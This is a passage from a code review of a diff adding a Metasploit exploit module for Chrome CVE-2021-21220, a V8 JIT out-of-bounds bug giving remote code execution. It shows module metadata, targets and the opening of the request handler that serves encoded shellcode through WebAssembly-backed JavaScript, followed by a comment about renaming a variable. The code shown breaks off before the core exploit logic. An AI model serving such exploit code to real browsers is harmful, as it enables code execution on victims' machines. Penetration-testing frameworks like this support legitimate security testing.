modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb

```diff
@@ -0,0 +1,179 @@
+  Rank = ManualRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE',
+        'Description' => %q{
+          This module exploits an issue in the V8 engine on x86_x64 builds of Google Chrome before 89.0.4389.128/90.0.4430.72
+          when handling XOR operations in JIT'd JavaScript code. Successful exploitation allows an attacker to execute
+          arbitrary code within the context of the V8 process.
+
+          As the V8 process is normally sandboxed in the default configuration of Google Chrome, the browser must be run with the
+          --no-sandbox option for the payload to work correctly.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Bruno Keith (bkth_)', # Vulnerability Discovery
+          'Niklas Baumstark (_niklasb)', # Vulnerabilty Discovery
+          'Rajvardhan Agarwal (r4j0x00)', # exploit
+          'Grant Willcox (tekwizz123)' # Metasploit Module
+        ],
+        'References' => [
+          ['CVE', '2021-21220'],
+          ['URL', 'https://github.com/r4j0x00/exploits/tree/master/chrome-0day'],
+          ['URL', 'https://twitter.com/r4j0x00/status/1382125720344793090'],
+          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1196683'], # Restricted at the time of writing, but should be public at some point.
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-21-411/']
+        ],
+        'Arch' => [ ARCH_X64 ],
+        'DefaultTarget' => 0,
+        'Payload' =>
+        {
+          'Space' => 4096
+        },
+        'Notes' =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'Targets' =>
+          [
+            ['Linux - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'linux' }],
+            ['Windows 10 - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'win' }],
+            ['macOS - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'osx' }],
+          ],
+        'DisclosureDate' => '2021-04-13'
+      )
+    )
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Sending #{request.uri} to #{request['User-Agent']}")
+    shellcode = Rex::Text.to_num(payload.encoded).gsub(/\r\n/, '')
+    jscript = <<~JS
+      var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
+      var wasm_mod = new WebAssembly.Module(wasm_code);
+      var wasm_instance = new WebAssembly.Instance(wasm_mod);
+      var f = wasm_instance.exports.main;
```

Comment:
Perhaps rename f to wasm_func?

Reply:
Thanks for these JavaScript updates, much appreciated! Will get these applied so long now 👍

Reply:
Changed name to `wasm_main_func`